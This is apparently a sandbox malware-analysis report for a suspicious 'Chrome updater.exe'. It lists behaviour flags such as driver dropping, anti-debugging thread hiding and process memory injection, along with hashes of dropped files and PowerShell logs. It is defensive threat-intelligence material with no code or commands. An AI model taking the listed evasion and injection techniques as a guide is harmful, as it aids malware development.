C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5044
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8.9MB
MD5e2df1fca37cff12eb333d1d11d11d5af
SHA121a2733360dbd70672448da47843cf6675087d59
SHA256cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68
SHA5129746086f68101b73c92805b18483d3e69d45052abddcf12a9da515d91f023febd3a9385b18ded0ff71e80da1f685b854bceb4f47da8baef23d22a0de0dd33e31
-
Filesize
8.9MB
MD5e2df1fca37cff12eb333d1d11d11d5af
SHA121a2733360dbd70672448da47843cf6675087d59
SHA256cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68
SHA5129746086f68101b73c92805b18483d3e69d45052abddcf12a9da515d91f023febd3a9385b18ded0ff71e80da1f685b854bceb4f47da8baef23d22a0de0dd33e31
-
Filesize
3KB
MD5ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
Filesize
1KB
MD579dc726cf3f3d480e77e5552b3d5ca34
SHA17106a9301c137f43bf4c3410276874c051867142
SHA256285775224b0349d5ecdfdda7a7aa5adb5b7c02f18e3c018ff5cf633a6caf6761
SHA51218e4bc2c5cd718250254f76c9661a4e2c11af807ebd884b67be12a82c2174c3c208f1f2dc5d77f66cc0aec08f7e666d247a9efc4d9461702709586ecefa4c86f
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
3KB
MD500930b40cba79465b7a38ed0449d1449
SHA14b25a89ee28b20ba162f23772ddaf017669092a5
SHA256eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize3KB
MD5811d351aabd7b708fef7683cf5e29e15
SHA106fd89e5a575f45d411cf4b3a2d277e642e73dbb
SHA2560915139ab02088c3932bcc062ce22d4e9c81aa6df0eacd62900d73d7ad2d3b18
SHA512702d847c2aa3c9526ddf34249de06e58f5e3182d6ef66f77ddbdbbd2e9836026da6eacac2c892cf186d79bdc227a85c14f493b746c03233ef8820d981721c70a
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5302a7c179ef577c237c5418fb770fd27
SHA1343ef00d1357a8d2ff6e1143541a8a29435ed30c
SHA2569e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f
SHA512f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699